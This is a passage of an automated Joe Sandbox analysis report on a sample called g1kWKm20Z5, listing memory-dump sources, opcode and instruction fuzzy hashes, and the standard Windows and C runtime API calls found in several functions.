                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef9f447ad74e91192cc3b01f303eb7ca3dc5ec1d29bfe9c2e6f9fbdfa1b176fd
                                                                    • Instruction ID: a0aa4bf3e4d537a92ce93f9e726837fc264071e7a9162c3afbdc2585123e9ce0
                                                                    • Opcode Fuzzy Hash: ef9f447ad74e91192cc3b01f303eb7ca3dc5ec1d29bfe9c2e6f9fbdfa1b176fd
                                                                    • Instruction Fuzzy Hash: 70021270510B508FC338CF29C6905AABBF1BF45711B944A2EDAA787B90D739F985CB18
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                                    • Instruction ID: b31777eaf4445a5ca230d2489b0392e25bee96f51372df8947d9b7d5b3c35a4e
                                                                    • Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                                    • Instruction Fuzzy Hash: FAE1D179A083168FC714CF19C4D06AAB3E2BF99710F55892EED9587381D339E8868B85
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                                    • Instruction ID: d371015dc2dd78ddfbec78816612abde45ee281d3e1f378e28cdae1071fe03e7
                                                                    • Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                                    • Instruction Fuzzy Hash: 15E1BC75B083168FC714CF18C4D066AB7E2FB88714F5989ADE9D58B381DB39E846CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 363acbbdeab20fcea08c686e9da4600208a3b96b3fab0763692ee7983efd47cc
                                                                    • Instruction ID: 7aad21176e94204ebf9be3326ef5f875fb6c76e3886be83ba2785e1930059451
                                                                    • Opcode Fuzzy Hash: 363acbbdeab20fcea08c686e9da4600208a3b96b3fab0763692ee7983efd47cc
                                                                    • Instruction Fuzzy Hash: CED1D1716083154FD30CCF5DC89532AFBE5ABC8710F4A892EE999DB3A1D6B8DC058B85
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7d24e026ab002554a5cc82306c4c121f3aa2aa126a956a255deec92847530bab
                                                                    • Instruction ID: 05fb3061c803852ccbcb55ec79df352ea4c9045d55e38e7908647069224f19b4
                                                                    • Opcode Fuzzy Hash: 7d24e026ab002554a5cc82306c4c121f3aa2aa126a956a255deec92847530bab
                                                                    • Instruction Fuzzy Hash: DAC1AF30A006468EFB24CF58C480AABB7B2BB09304F14465FD956D7BB1D778ADC6CB59
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee76e20e5c37595785789d759f783c4b647590ae66676044ba7df5895097dc4f
                                                                    • Instruction ID: 86255bcc3f122f9cb2bdcdd6b3c86e7cac227984b0ae32171133bf816eefb62b
                                                                    • Opcode Fuzzy Hash: ee76e20e5c37595785789d759f783c4b647590ae66676044ba7df5895097dc4f
                                                                    • Instruction Fuzzy Hash: 0EC1EE70A006469FEB28CF28C69066FBBB1EF05304F94461FF85697391C7B8AD46CB59
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 22a249e8036389ca2a94441644932b39595e3d331b0a1c1fbadceed0361bbadf
                                                                    • Instruction ID: be4b2c5f41c1c6b016d0662a1a3aa3dff1cc49737e4a0fee46609b29334a7491
                                                                    • Opcode Fuzzy Hash: 22a249e8036389ca2a94441644932b39595e3d331b0a1c1fbadceed0361bbadf
                                                                    • Instruction Fuzzy Hash: C3C18E716087518BC728CF1CC4903AEB7E2AFC4310F19CA2EE999D7795D7789881CB96
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
                                                                    • Instruction ID: ecdb7d8b3c128cef4b5a8eef640ce4e1348b954c5e1c8cc4e6b72fcb2b8dd03a
                                                                    • Opcode Fuzzy Hash: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
                                                                    • Instruction Fuzzy Hash: 07C18F70608386AFC714CF28C84469ABFA1BF65304F04865EF8994B782D774DA68CB96
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dc47058bb36163437909b73a5b85653ba8b3b080b3ce5340834d88d047b42e12
                                                                    • Instruction ID: 33946987a401538ec29d146c49bd0777ead14b37c14ca5df7bbf2076656dae12
                                                                    • Opcode Fuzzy Hash: dc47058bb36163437909b73a5b85653ba8b3b080b3ce5340834d88d047b42e12
                                                                    • Instruction Fuzzy Hash: FB9116327041214FD35CDB3D8D66529FBE6ABC9244F49CA3EE08ACB292E974DA13C751
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a39a2fe1fb783dc0ebd96aaa4b09021d3a3dec2b0e9adff76d855defd5a20da3
                                                                    • Instruction ID: 2f1fa1f2c0ce5c767d39326a4a7df2626eefc8e715aa17eb357957d79dd35fa3
                                                                    • Opcode Fuzzy Hash: a39a2fe1fb783dc0ebd96aaa4b09021d3a3dec2b0e9adff76d855defd5a20da3
                                                                    • Instruction Fuzzy Hash: 7A8171716087518BC728CF2DC8906AEFBE2AFC4310F19CA2EE8D9D7795D6349881CB55
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fcdd6333bcced19b981ab71a904a24c27a086616c56a7af56b535d3d20f827b4
                                                                    • Instruction ID: 7f6a3678a30058b370d0d799ec085ce4703b2b826dd53e06f65c8239fe1aa67b
                                                                    • Opcode Fuzzy Hash: fcdd6333bcced19b981ab71a904a24c27a086616c56a7af56b535d3d20f827b4
                                                                    • Instruction Fuzzy Hash: FE516E71E00119AFEF04CF99C941AAFBBB2FF88304F19849DE815AB201C7749E51DB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 768c1d889d3b0b4dd139f02215e342ea367a32b8572c76f95433df72e755d40e
                                                                    • Instruction ID: de9ed496828060945def11e817e7598d09d079133ac2fb2d8aa5c02de47949ab
                                                                    • Opcode Fuzzy Hash: 768c1d889d3b0b4dd139f02215e342ea367a32b8572c76f95433df72e755d40e
                                                                    • Instruction Fuzzy Hash: C551CE317080610FD39CE63D8967439BAE69BC9144B49CA7EE0DBCB692E875CA23C751
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
                                                                    • Instruction ID: 0a1bca97f873a7a6d6a3aaff04d58e0ae48002bfba7cab88bc6042a4b6745ab0
                                                                    • Opcode Fuzzy Hash: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
                                                                    • Instruction Fuzzy Hash: F841F2726013149FD320DF15DC80B26B7E4FF84718F16452AED4587725E778F850CA99
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: affec256aca3101603e5e9c8b6c14aac85f880b69ce3fa9b32540f72830965cb
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: 62113BF7A0104243D7058A2DF9B47B7D395EFCE320F2C626BD0514B758D12AE9459608
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: b9abfda41b353c0c1e3259c952a9147802510d6a115bd1598094fb39f66939d6
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: 1711EBB734118B47D6148A3DD4BC6BAA79DEBC7129B2DC37AD0428F75CD3229144D604
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
                                                                    • Instruction ID: c3a51ff81cd43cadc2f91b9d343c289a0ae24623370d929bafb0354b6f338a0e
                                                                    • Opcode Fuzzy Hash: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
                                                                    • Instruction Fuzzy Hash: F61194B66002147FE3006F69DC85E27BADCEB44354F45817AFD089B212D639ED14C6A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 667bd2f19aee6fa7d81c4cb481a3f51af8e19f63dc029046603eb54790070f8a
                                                                    • Instruction ID: af7ec3d076cba136a0faee5a26742be77a46195bb570506c981dbde19bbbb0ba
                                                                    • Opcode Fuzzy Hash: 667bd2f19aee6fa7d81c4cb481a3f51af8e19f63dc029046603eb54790070f8a
                                                                    • Instruction Fuzzy Hash: 5411A0B2600248AFE314AF69CC84E27FAEDEB48254F058179FD0D9B222D635ED148A61
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                                    • Instruction ID: 775a38982ecc14386774c10a2ff7988f4febef0241ab9f2fac4c7ed0a075f983
                                                                    • Opcode Fuzzy Hash: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                                    • Instruction Fuzzy Hash: 5F21AF71A002268FCB24CF58C890B6BB7B1FF86708F69865DC8066B342D775EC42CB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612871914.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8ad000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                    • Instruction ID: 1ec3f40412330d98dfcb47adbe96a85c50e2d5fbe26caa53877c373d6e25306d
                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                    • Instruction Fuzzy Hash: 701182723412009FE744DF55DC81EA673EAFB9D324B298055ED09CBB12D675EC41C764
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                                    • Instruction ID: 5cf5f964e5d4fdf4ab25e9de6bfd162346dccf7c83c49c61d1a40ba7c9897cbe
                                                                    • Opcode Fuzzy Hash: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                                    • Instruction Fuzzy Hash: 36118A77A1827107D711CE759CE021AF7629BC622270F4376D981AB352C170EC5892D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                                    • Instruction ID: 5e6f75d6069618f27f4e8ece13d34dcb27fa1cb4973037488a19f9399b438bca
                                                                    • Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                                    • Instruction Fuzzy Hash: 04E01A75A116849FD7018F25E994B007BA1E704B10F458066F800D7A79F3B86C80CF8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                                    • Instruction ID: cc6de226588e04b46f83be25afce72c310d6fcd302776d635664c13a5735f165
                                                                    • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                                    • Instruction Fuzzy Hash: 86C08C740009804BCE39892082703A43365B381782F8804CCC8028BA49C71E98C2FA10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                                    • Instruction ID: 2572daf3ac28ea9ece149f63ca22f641f49709f61c5ee85f622209572a58cfb2
                                                                    • Opcode Fuzzy Hash: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                                    • Instruction Fuzzy Hash: 33D08C31365650AFCB41DB48DD42F00B3E0EB48B32F258282B830AB2F2C724FE41CA05
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                                    • Instruction ID: c0944383d73aac26117361346b053748916b56d97ab65fadc12e4df891c8d7e9
                                                                    • Opcode Fuzzy Hash: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                                    • Instruction Fuzzy Hash: 7AB00279661540CFCA55CF08C198E00F3F4FB48760B068491EC05CB722C234ED41CA10
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00459ABE
                                                                    • CatchIt.LIBVCRUNTIME ref: 00459C1D
                                                                    • _UnwindNestedFrames.LIBCMT ref: 00459D1E
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00459D39
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm$x@F
                                                                    • API String ID: 2332921423-3829711656
                                                                    • Opcode ID: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                                    • Instruction ID: 2a8b5e3cbe88d0ad45d83a49b6c8541956edddbcc5d33c7cd0fd48112d7d16c1
                                                                    • Opcode Fuzzy Hash: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                                    • Instruction Fuzzy Hash: F9B16771800249EBCF19DFA5C8819AEB7B5FF04316F18415AEC116B213D338EE59CBA9
                                                                    APIs
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0045C0FF), ref: 0045C7AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DecodePointer
                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                    • API String ID: 3527080286-3064271455
                                                                    • Opcode ID: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                                    • Instruction ID: 82d02ba150d8eb4d5d6beeccfbe315dd90ac4e528bf330bfbd80dbdd17a07d9b
                                                                    • Opcode Fuzzy Hash: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                                    • Instruction Fuzzy Hash: 585170B0900B0ADFCF149F69D8C81AEBBB0FB45316F14414BD881A6256DB788959CF5E
                                                                    APIs
                                                                      • Part of subcall function 00454B19: CreateFileW.KERNEL32(00000000,00000000,?,00454716,?,?,00000000,?,00454716,00000000,0000000C), ref: 00454B36
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74E2F770), ref: 00454781
                                                                    • __dosmaperr.LIBCMT ref: 00454788
                                                                    • GetFileType.KERNEL32(00000000), ref: 00454794
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74E2F770), ref: 0045479E
                                                                    • __dosmaperr.LIBCMT ref: 004547A7
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004547C7
                                                                    • CloseHandle.KERNEL32(00455523), ref: 00454914
                                                                    • GetLastError.KERNEL32 ref: 00454946
                                                                    • __dosmaperr.LIBCMT ref: 0045494D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                    • String ID:
                                                                    • API String ID: 4237864984-0
                                                                    • Opcode ID: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                                    • Instruction ID: 038922a14cfed84d654bc7e4756cd55dec8d6f56b9250bad4a8b086e30f44e5e
                                                                    • Opcode Fuzzy Hash: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                                    • Instruction Fuzzy Hash: C4A13731A041449FCF189F68DC91BAE3BA0EB87329F14015EFC019F392DB78885AC75A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: %1.17g$[,]{: }$false$null$true
                                                                    • API String ID: 4218353326-762322047
                                                                    • Opcode ID: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                                    • Instruction ID: 8a31c525fd10ccff58647d80abb421e7a2f49e00f52c285c36168c55111fec75
                                                                    • Opcode Fuzzy Hash: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                                    • Instruction Fuzzy Hash: E8B1E4F27043015BC701A9298C5062BA6DA9FD1318F19493FEF59E33C2FA7EDD16425A
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0043D7A7
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D7AF
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0043D838
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0043D863
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0043D8B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                                    • Instruction ID: f027fe2574540ca3b1f88e77f7abec4aa80c90a537e94c27518ff210aad43bfc
                                                                    • Opcode Fuzzy Hash: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                                    • Instruction Fuzzy Hash: 0041EA34D012089BCF14EF69D881A9F7BB5FF48318F14816BE8249B352D739EA15CB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                                    • Instruction ID: 20f6fc253ed9e18728f1e3e0f73237be974277a9ced04a575444c598e2f27323
                                                                    • Opcode Fuzzy Hash: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                                    • Instruction Fuzzy Hash: 05B1F574A04285AFDB15CF99C980BBE7BB1BF86305F14415BE80067393C7B89D4ACB69
                                                                    APIs
                                                                    • _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                                    • __FindPESection.LIBCMT ref: 0044C6D1
                                                                    • VirtualQuery.KERNEL32(83000000,8F497764,0000001C,8F497764,?,?,?), ref: 0044C7B6
                                                                    • __FindPESection.LIBCMT ref: 0044C7F3
                                                                    • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                                    • __FindPESection.LIBCMT ref: 0044C82D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2529200597-0
                                                                    • Opcode ID: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                                    • Instruction ID: e40285013e32dfb27aa5986082f3d9acaacd06ee7156ac865e10eba53592a1aa
